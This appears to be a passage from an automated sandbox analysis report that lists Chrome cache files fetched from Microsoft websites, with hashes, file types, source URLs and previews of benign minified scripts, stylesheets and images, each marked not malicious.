                                                                                                                      Malicious:false
                                                                                                                      Preview:/*******************************************************************************. * Copyright 2017 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.if (window.Element && !Element.prototype.closest) {. // eslint valid-jsdoc: "off". Element.prototype.closest =. function(s) {. "use strict";. var matches = (this.document || this.ownerDocument).querySelectorAll(s);.

                                                                                                                      Chrome Cache Entry: 323

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):52717
                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                      Malicious:false
                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)

                                                                                                                      Chrome Cache Entry: 324

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 594 x 332, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):26647
                                                                                                                      Entropy (8bit):7.961164465196959
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:nhL1z7tVW03Npmi6K0i1WRphEQAjQLj9I32JxMqJn26OsNCVbgP6re0QG9d8b1P:h1zXWKYi90i+Az3cxMqV26pNAeTG9do
                                                                                                                      MD5:7343B003F48E30FBDDF87CFC795E860A
                                                                                                                      SHA1:12FF2D14D7666F516CAF23848113902A7D5570C6
                                                                                                                      SHA-256:B8B3DBA0B8C52DB7CCBFAD56815F0F38E83895488101C51AA580AD581D7115CC
                                                                                                                      SHA-512:39E291A9E69D1D22B414428148EA7795FF1D33F875BF823F0E8C96276431E7AAE5A1B4EF7F050492B9903214B5FE7B9B4C92FF1B68A03A614258BA04605640C5
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/bcd2fdf1-530a-482f-b96d-5f2f2a49ac66.png
                                                                                                                      Preview:.PNG........IHDR...R...L.......R.....pHYs...%...%.IR$.....sRGB.........gAMA......a...g.IDATx....wUU./...`.2j2.&C `.X....L.H.b.1.B...1*.J.%5..Z%2....EH.$..../........~..y....=...Y....s....{.s.*+V.X..b.UVa.]..X5........:N.Z...5d.C.5.9.Yvl^..8....\im..h...M.9....l3[...h..w......f..:..'.W..2....y.(.$'..TD....].S.NSx(.z...J...~.!.b.J..o.AE.B.A.......>f:...:&...eYDTOV!....(E.G..&1.+.JY...&|J..M.K...J....w.$.h2...G1..[....}.....2E7a.rs.;..o....|.e..m...e.1..(.k.r...K".\.K.)..".(J..p.>.."*v...|..7.1C.L........S.w.g;....w....QB%.....%.Z].S..S../=.._.. -.......C..}b.....m..-..W..es....N....y..-.nS.T%..t3.IZQ.?.....R..Zxp.$yIc.....&d...2|.]...'...>.....&.T.'...B..%......Oj.Q....xkFR...+.|yH.s.B..>...*..J.SW,...Z.*d(...*.v..&,Y....Sf.....K.m.E.WL.~.B.D...&..c.Z..|l.li$.$.V.P}.BJ.~.p...T.IM..1>.'cn........!..6CR*&..Y.r.k....=.nL.->....2W......9...J....c.`S8A...R...(Q.N.V+K+.-........*..[b..]._{.."%D'-...e...R'...k.T!.(...Q...>R.#.-Y.}\......U*T../..

                                                                                                                      Chrome Cache Entry: 325

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):21727
                                                                                                                      Entropy (8bit):5.232101618468897
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:384:xYzlQeau9P3TI8NCUiLFv1uP4ZVSc2uQyea+eHbJjaTbz7NiCR6Rv98NOsQzOiL/:xYhQel3TI2ChBt2OVSZuQoJjG7N1R6Rp
                                                                                                                      MD5:C49C34EE38F103BCB82F58DED32F57DB
                                                                                                                      SHA1:757C8CE6D92102903F636C20B70E414A5E9A2E20
                                                                                                                      SHA-256:BDBBDA3BD97031FF5BCB76B427D2ECD9C4617922C3860F662E51FB18AC5CC591
                                                                                                                      SHA-512:5C5307784F8B7D3CF479154CADF3525D1D1BF05216D72BB32ABEF6E25183E26FB4D84DB7B14AA2868B11F54E23284D02BFE0309EE4D560AC79A507F762DBC219
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*! Copyright (C) Microsoft. All rights reserved. */....(function ($) {...'use strict';...(function smartFeedback() {....var activatedStarRatingValue = null;....var activatedStarRatingLabel = null;....var userSelectionIsInfoHelpful = null;......var checkBoxSelected = false;....var starRatingSelected = false;....var verbatimEntered = false;....var $spanDisplayElementsForStarCheckbox = $(".translationRatingStar, .checkboxTick");....var $extendedFeedbackStarCheckboxElements = $(".translationRatingStar, .articleExperienceOptionsCheckbox");......var $extendedFeedback = $("#extendedFeedback");....var $extendedFeedbackForm = $("#extendedFeedbackForm");....var $feedbackWrapper = $('#supWrapperToPreventFeedbackFlickering');....var $starRatingDescription = $("#starRatingDescription");....var $supDisableStickyFeedbackButton = $("#supDisableStickyFeedbackButton");....var isEnableStarRating = $feedbackWrapper.data("enableStarRating") ? $feedbackWrapper.data("enableStarRating").toLowerCase() === "tr

                                                                                                                      Chrome Cache Entry: 326

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (65394)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):91802
                                                                                                                      Entropy (8bit):5.3603423050848615
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:1536:C4F18VDgLMcb+0XbPN1xlJGFqCN3tcULcUoHfe:C4F18VDgLN9LN1mTn
                                                                                                                      MD5:CF5CC7F4B57526CC37893DCB83DED031
                                                                                                                      SHA1:E953783BE0A7894585778455AAE3D0DF094D6F29
                                                                                                                      SHA-256:3A790B6C0D26D7A4D292CB27F992EAFAFF42C37E9318B2AB704207039127FCB8
                                                                                                                      SHA-512:2320F9D7811CD773C1E5C2E95A31B39E9FF62A2FA7CA431975873DAB57AE42A75BA720D15AEB47FA2EA127D0766EB5AA15040CFFD04BF7A8CB8BCD7236069C40
                                                                                                                      Malicious:false
                                                                                                                      Preview:/*!. * 1DS JS SDK Shared Analytics, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeControl3",s=(s=e)[c]=s[c]||{},l=(l=e)[c="oneDsMeControl"]=l[c]||{},e=s[i]=s[i]||{},f=e.v=e.v||[],c=l[i]=l[i]||{},d=c.v=c.v||[];for(t in(c.o=c.o||[]).push(o),n(r),r)s[t]=r[t],f[t]=u,l[t]=r[t],d[t]=u,(a.n=a.n||[]).push(t)}(this,function(e){"use strict";!function(e,n,t){var r=Object.defineProperty;if(r)try{return r(e,n,t)}catch(i){}typeof t.value!==undefined&&(e[n]=t.value)}(e,"__esModule",{value:!0});var y="function",m="object",se="undefined",C="prototype",I="hasOwnProperty",b=Object,S=b[C],x=b.assign,w=b.create,n=b.defineProperty,_=S[I],T=null;function O(e){e=!1===(e=void 0===e||e)?null:T;return e||((e=(e=(e=typeof globalThis!==se?globalThis:e)||typeof self===se?e:self)||typeof window===se?e:window)||typeof global===se||(e=global),T=e),e

                                                                                                                      Chrome Cache Entry: 327

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (601)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):10434
                                                                                                                      Entropy (8bit):5.138897195822734
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:ucdsngdKadwed0XdLIdLdOgdOudq/m0YdOK/KadqMdrudq/B2nded8vd7dtkkYdd:Nsg31oLYBlxq/bIH/Kyq8yq/B2d2YRtm
                                                                                                                      MD5:E5E717DDD1C394CD4371209C7CD8BD28
                                                                                                                      SHA1:B1B35E8AAEB2AA8E3A6F622DEF626AEF871A3BB3
                                                                                                                      SHA-256:8511F1B20AB4F34B58C0D65507297CE00B07F341E5CFC31E38169230FA295BF6
                                                                                                                      SHA-512:8DD6C2E6432FB0717F4472C6A8BA1B6B6F26C2B35F876DE2F9136F36FCA27DC05A9DC9FE5E912335F83A02BED765EE2BAAF3EAD87CD0B4A8A4204C8D75663325
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/components/content/Inpagenavigation/v1/Inpagenavigation/clientlibs/sites.min.ACSHASHe5e717ddd1c394cd4371209c7cd8bd28.js
                                                                                                                      Preview:'use strict';function calcNavItemWidth(){var d=0,c=$("#stickyNavDesktop .more").outerWidth(!0);$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").each(function(){d+=$(this).outerWidth(!0)});c=$("#stickyNavDesktop").width()-c;var f=$(".custom-sticky-nav").hasClass("windows-scroll-effect")?90:45;0!=d&&d/c*100>f?(c=$("#stickyNavDesktop \x3e ul \x3e li:not(.more)").last(),c.attr("data-width",c.outerWidth(!0)),c.prependTo($("#stickyNavDesktop .more ul#submenu")),calcNavItemWidth()):(f=$("#stickyNavDesktop li.more ul#submenu li").first(),.d+f.data("width")<c&&f.insertBefore($("#stickyNavDesktop .more")));0<$(".more li").length?$(".more").removeClass("d-none"):$(".more").addClass("d-none")}.function checkIfMoreHasOptions(){setTimeout(function(){$(".custom-sticky-nav .more li:not('.navitem-right-mobile')").hasClass("active")?($(".more .more-options-link").addClass("active-more"),$(".nav-right-items ul li").removeClass("active")):($(".more more-options-link").removeClass("active-more"),$(".nav-r

                                                                                                                      Chrome Cache Entry: 328

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (3637)
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):3690
                                                                                                                      Entropy (8bit):5.141541571595828
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:Af3vI6YmI62HUbHbZbpVuJRDhxwC9jTx+IRcaOs/Z:Af3vI6YmI62HUrllgffOQZ
                                                                                                                      MD5:A249B03B72AB5E7B60E7806457B9BE61
                                                                                                                      SHA1:FF0B5F4FB91A9DBF147262AD59B292C6C2DFE122
                                                                                                                      SHA-256:48FF8C6449BEF199F206C7A1C49403E10DC6341A9D4A1F8946B042DDE66E315F
                                                                                                                      SHA-512:29F204E3813972DC76FCE3DD6715093646EB0DA52DEDAC5E7E09B618E5CF8703CDE95D463727EB29F90D461D0C5A73B5701EC39B994A268103A06306144A6F34
                                                                                                                      Malicious:false
                                                                                                                      Preview:!function(){"use strict";var n;!function(n){n.PromotionBanner=".PromotionBanner",n.TopPageBanner=".TopPageBanner",n.AboveUhfBanner=".AboveUhfBanner",n.RailBanner=".RailBanner",n.NpsRailBanner=".NpsRailBanner",n.RailSecondaryCtaBanner=".RailSecondaryCtaBanner"}(n||(n={}));var e=[{dismissSelector:null,clickSelector:"#ucsTopBannerButtonLink",element:n.PromotionBanner},{dismissSelector:"#top-banner-dismiss-button",clickSelector:"#ucsTopBannerButtonLink",element:n.TopPageBanner},{dismissSelector:"#uhf-banner-close",clickSelector:"#upgradeUhfBannerButton",element:n.AboveUhfBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button",element:n.RailBanner},{dismissSelector:"#nps-rail-close",clickSelector:"#nps-rail-link",element:n.NpsRailBanner},{dismissSelector:"#rail-banner-dismiss-button",clickSelector:"#rail-banner-button, #rail-banner-button-secondary",element:n.RailSecondaryCtaBanner}],t=function(){return t=Object.assign||function(n){for(var e,t=1,r=argument

                                                                                                                      Chrome Cache Entry: 329

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (584)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6798
                                                                                                                      Entropy (8bit):5.383941368080596
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:2+ocdo4VYgB9G/0y/qhNJ5k4iflBDHndCjOGGWr:2+ocdo4B7G/0yyNSflhndCjOGGA
                                                                                                                      MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                      SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                      SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
                                                                                                                      SHA-512:8C26E45CA37AC5DCCCC0C7BBCA92E0E8E11FB807A6D9A6916D5A0CC1CF198A7942DD5583C31ACBD1A11DDE004C252806D205E9CFDA7F494A6F7D5BBFA42920E4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASH1dabd5cc3f7b68c178b59ea74dc62947.js
                                                                                                                      Preview:'use strict';(()=>{function m(f){var e=G[f];if(void 0!==e)return e.exports;e=G[f]={exports:{}};return I[f](e,e.exports,m),e.exports}var I={1623:()=>{$(function(){function f(){-1!==document.cookie.indexOf("".concat("Cascade.AuthSSO","\x3d"))&&(document.cookie="".concat("Cascade.AuthSSO","\x3d; expires\x3dThu, 01 Jan 1970 00:00:00 UTC;"))}function e(){var a=function(){var d=document.cookie.match(/(^|;\s*)(Cascade.AuthSSO)=([^;]*)/);return d?(d=parseInt(decodeURIComponent(d[3])),!isNaN(d)&&d>n.DefaultAttempted?.n.SharedStateAttempted:n.DefaultAttempted):n.NotAttempted}(),c=!(!window.msauthRpsShare||b.accountConstraint===w.AAD);if(a===n.NotAttempted||c&&a!==n.SharedStateAttempted)!function(d){$("#".concat("cascadeauthsso")).remove();var g=document.createElement("iframe");g.src=d;g.setAttribute("width","0");g.setAttribute("height","0");g.setAttribute("border","0");g.setAttribute("frameborder","0");g.setAttribute("style","display: none");g.id="cascadeauthsso";document.body.appendChild(g)}(""

                                                                                                                      Chrome Cache Entry: 330

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:PNG image data, 297 x 166, 8-bit/color RGBA, non-interlaced
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):6270
                                                                                                                      Entropy (8bit):7.945330124411617
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:zS7+uH6tmhCSqN0K4Wykh3YMBYpAjav+tlXQ:m7vHqS9WyiooqSa2m
                                                                                                                      MD5:5C04A186E00E47C2F90ED18E03AB4093
                                                                                                                      SHA1:AC859795B92E3FA0FA88868AF532A3ED6F30F12A
                                                                                                                      SHA-256:1A16DBCD6926721D9C3AEB85429586B307F11D2093CF9AEEFDAA37898CB74D46
                                                                                                                      SHA-512:909830B01A21E61D98ADF1C61DFC44BD414CF03C51250A9DD7B5C26FB12D6334D984A21F25B5ED089FFDED4CAAA764579EEA317470C8616B7928E989B1A1778A
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.content.office.net/en-us/media/f4e85874-2a1a-438d-9c3c-17b069c454c0.png
                                                                                                                      Preview:.PNG........IHDR...)...........y;....pHYs.................sRGB.........gAMA......a.....IDATx...._S...SE4....&..DE0(.e.&jb...h....C..b,.i.na.2pI.P"H.!. ZB....w.~..g_._..$'.....>...k..p.....z............:.x...l...:.g.u.......Fz..I..Sh.......T..L)}.c..e.T1.........OL..T,\N\..K4.57.......{./.yR.H.JlQ......@..b...TAT.....)6.0-."... .&..:K.d]1L...R..lJ.......:.....9.|?}..........g..K..._.R....bk.i..E..K.%`...O....i..E.U....J.L.v.|..a........bV.jY.>3...M.$R......T.J.....(:......z..L..E5".w.wl.w.g.A1..E.|.......[*a...g..T.....J...U.z..|.l)..8..U..kp.cR........T...1..l.n|.i....5..*.k.j...q.F.}.E/#.j...D....T....3'..^.^:.4.Z....K.`..c@9.Y.=S.W..t..=&.Z.G.R-....%f..xG...".../l.....[.WTw/er#..I.....L.>..R\.........!..U. .5...C.ol.0%....=.....L..B..L..9.&..c.O%T|..h........egj?A......&...-*.X......;p...nf....T.....,bea.bj#.%....1..0L(Q.... ..sL..P...E.cX%.e...v.SQ".njw...:.>...\.%...b[T..cn'.#Z..i...C..%CX."....ej<.Q.LB......u.(.....E.?.'sR...DN

                                                                                                                      Chrome Cache Entry: 331

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (1290)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):11629
                                                                                                                      Entropy (8bit):5.449562181288923
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:D+BJaYpdowNJ0EwWnvUaBBVaJxQvqKTAphPgffazesLZEU1bsLM7vImzwXdrQ9Cr:D+DDdowNJ0EwWnvUaBBVaJxQvqKTAphS
                                                                                                                      MD5:BB93CF674BEB54673814249DCF4EFC96
                                                                                                                      SHA1:3190F4BE4D37525C6B3222B93EEAFBC66B538E94
                                                                                                                      SHA-256:9653EB19E7206B44513D92E4C9359B289FC2478D4611AE01C5798C89C8211E70
                                                                                                                      SHA-512:D7E09140CF399BDEB513544617FABD95AB62BE0D9DD265B2A9E5EB5D1DC29497FE5A4088E66A00C4AEBB9529A217354EBEF512E504B22245CF8C12DC3D95B449
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-windows.min.ACSHASHbb93cf674beb54673814249dcf4efc96.js
                                                                                                                      Preview:'use strict';var currentLocale=$("html").attr("lang").toLowerCase(),currentPage=window.location.pathname.toLowerCase(),targetPage="/en-us/windows/business/windows-11-pro",enableExperiments=document.querySelector("meta[name*\x3d'enabled-experiment']"),enableExperimentsValue=void 0!=enableExperiments&&null!=enableExperiments?enableExperiments.content:"",DB_AUDIENCES="Software \x26 Technology;Business Services;Telecommunications;University;Financial Services;Manufacturing;Education;Construction;Healthcare \x26 Medical;K12".split(";"),.win_personalization={"en-us":{alt:{"Software \x26 Technology":"A man working at a standing desk surrounded by three monitors with coding information on screens.","Business Services":"A conference room with Microsoft Teams on monitor and several people around a table with laptop open, working on schematic.",Telecommunications:"A single telecommunications tower rising amongst a sunset and mountains.",University:"Several college-age students with laptops open,

                                                                                                                      Chrome Cache Entry: 332

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (7862)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):129677
                                                                                                                      Entropy (8bit):5.330029900554168
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3072:BkDsmoyraxaOfNPN5/4OYQk9qNeUyMLBRMr:BkZX2xaw8
                                                                                                                      MD5:10908F1C465EEADC74B1C17C9515EB8A
                                                                                                                      SHA1:EAB69087F1E08128C3B08CE3AFB6E5980CBF058D
                                                                                                                      SHA-256:51F1F59783B1C7C3C9F4C892F629C6A9F801ECCFC2CEA0B1D6AB5A1DC685DD03
                                                                                                                      SHA-512:55CF4EFB3D2314CF1ECE48E9A146A40B6A884C66027FD19BDDC2BBCBCCBAAA0C07DF6AE7937DC1DD8783257B515ABF0B2CF84F2E0CDA4236FA92ED01A54FDDD1
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-base.min.ACSHASH10908f1c465eeadc74b1c17c9515eb8a.js
                                                                                                                      Preview:/*******************************************************************************. * Copyright 2017 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.if (window.Element && !Element.prototype.closest) {. // eslint valid-jsdoc: "off". Element.prototype.closest =. function(s) {. "use strict";. var matches = (this.document || this.ownerDocument).querySelectorAll(s);.

                                                                                                                      Chrome Cache Entry: 333

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65513), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):100179
                                                                                                                      Entropy (8bit):5.2435712713226845
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:768:2qnFfbkxlWF8tdYRZMcPEk5BFIsbyy9ojybRpWJIYpQ58WLJY8wE2usUrGBux+dZ:k3WdZ0oQZ2LvEV5jNWxb95e
                                                                                                                      MD5:33BF947D1178156F1D7E83A0FBCF358F
                                                                                                                      SHA1:CF6D6E22E199A2C7365E094B7EC217E8CF8949B3
                                                                                                                      SHA-256:0B042AEAB7553F44AE03FFCC375E4AC4AC330F18EF633A52B7107BFE0DFA6BC9
                                                                                                                      SHA-512:87EAC2083EAF95D1CB17B52D32B27E25FC386C639630A5D9AE266BCB9E2AE3CDF1B192924BBDF822F2F661626F835449C97377CCD3A07AB8182AED7B4E6D2523
                                                                                                                      Malicious:false
                                                                                                                      URL:https://support.microsoft.com/css/Article/article.css?v=CwQq6rdVP0SuA__MN15KxKwzDxjvYzpStxB7_g36a8k
                                                                                                                      Preview:.html[dir=rtl] .supHomeAndLandingPageSearchButton{right:auto;left:0}html[dir=rtl] .supHomeAndLandingPageSearchBox{padding:0 18px 0 50px}.supHomeAndLandingPageSearchBoxForm{margin:auto;position:relative;max-width:748px}.supHomeAndLandingPageSearchBoxForm .supSuggestionList{margin:0;padding:0;list-style:none}.supHomeAndLandingPageSearchBoxForm .supAutoSuggestContainer{width:100%}.supHomeAndLandingPageSearchBoxForm .supSuggestionItem{text-indent:0;padding-left:18px}.supHomeAndLandingPageSearchBoxContainer{position:relative}.supHomeAndLandingPageSearchBox{width:100%;height:51px;font-size:1rem;padding:0 50px 0 18px;border:1px solid #a9a9a9;outline:0;font-family:"Segoe UI","Segoe UI Web","wf_segoe-ui_normal","Helvetica Neue","BBAlpha Sans","S60 Sans",Arial,sans-serif}.supHomeAndLandingPageSearchBox::-webkit-input-placeholder,.supHomeAndLandingPageSearchBox:-ms-input-placeholder,.supHomeAndLandingPageSearchBox::-moz-placeholder,.supHomeAndLandingPageSearchBox::-moz-placeholder{color:#505050

                                                                                                                      Chrome Cache Entry: 334

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):49911
                                                                                                                      Entropy (8bit):7.994516776763163
                                                                                                                      Encrypted:true
                                                                                                                      SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                                                                      MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                                                                      SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                                                                      SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                                                                      SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                                                                      Malicious:false
                                                                                                                      URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                                                                      Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...

                                                                                                                      Chrome Cache Entry: 335

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (442)
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4206
                                                                                                                      Entropy (8bit):5.149477471473544
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:bV8irqJfqdqD7c1QkE5vYLXWOXblopFB5nj6Fcw:huYvE1YCOWrB6D
                                                                                                                      MD5:7E4C571D7EEBB658AE1F491FB0F54362
                                                                                                                      SHA1:934C3B0A597A0559EB7B8470C066F68CD916210A
                                                                                                                      SHA-256:3295588A9D0267946056C879C46878AA357C4EE45AA2459F3D278905062B9655
                                                                                                                      SHA-512:5C067C563B7C00D2081691F28EA33DFA7BF7A3B48E6F1239B58261C0B5BD8E3917CA881E3E68717D93D521F140C4F5CE24322A23ED236FCA3B2F6BB4F9194BF4
                                                                                                                      Malicious:false
                                                                                                                      URL:https://www.microsoft.com/etc.clientlibs/mlsd/clientlibs/clientlib-site.min.ACSHASH7e4c571d7eebb658ae1f491fb0f54362.css
                                                                                                                      Preview:.MLSD .border-radius-8px{border-radius:8px}..MLSD .border-radius-4px{border-radius:4px}..MLSD .border-radius-img img{border-radius:8px}..MLSD .mlsd-articles-2col-r.col-md-4 .content-card .row.row-cols-1.row-cols-md-2 .col{flex:0 0 100%;max-width:100%;padding-bottom:3rem}..MLSD .cards-without-image .card-group>.card{padding:7rem 2em}..MLSD .container .sticky-tabs .container{width:100%;padding:0}..MLSD .col-md-8 .richtext ol li,.MLSD .col-md-8 .richtext ul li{padding-bottom:10px}.#uhf-footer.c-uhff{margin-top:0}..MLSD .mlsd-compare-chart .compare-chart{overflow-x:hidden !important}..font-w-normal{font-weight:normal !important}..font-w-600{font-weight:600 !important}..font-w-900{font-weight:900 !important}..color-light-for-mobile .card-body,.color-light-for-mobile .card-body a{color:#fff !important}..color-dark-for-mobile .card-body,.color-dark-for-mobile .card-body a{color:#000 !important}..color-grey-for-mobile .card-body,.color-grey-for-mobile .card-body a{color:#808080 !important}.@me

                                                                                                                      Chrome Cache Entry: 336

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      File Type:ASCII text, with very long lines (4873), with no line terminators
                                                                                                                      Category:downloaded
                                                                                                                      Size (bytes):4873
                                                                                                                      Entropy (8bit):5.2268236765669895
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:p6+5cDrFRe+/zH/pMWtPfHGHPiBwXA4nHjnwwX8ntj29X8nvDMwtKcDneTbZoDy:k+5cDrFQO7pMWtPfmHPiBwXznHjnwwXp
                                                                                                                      MD5:ED927CF0F8A1BE103DF48446270416EE
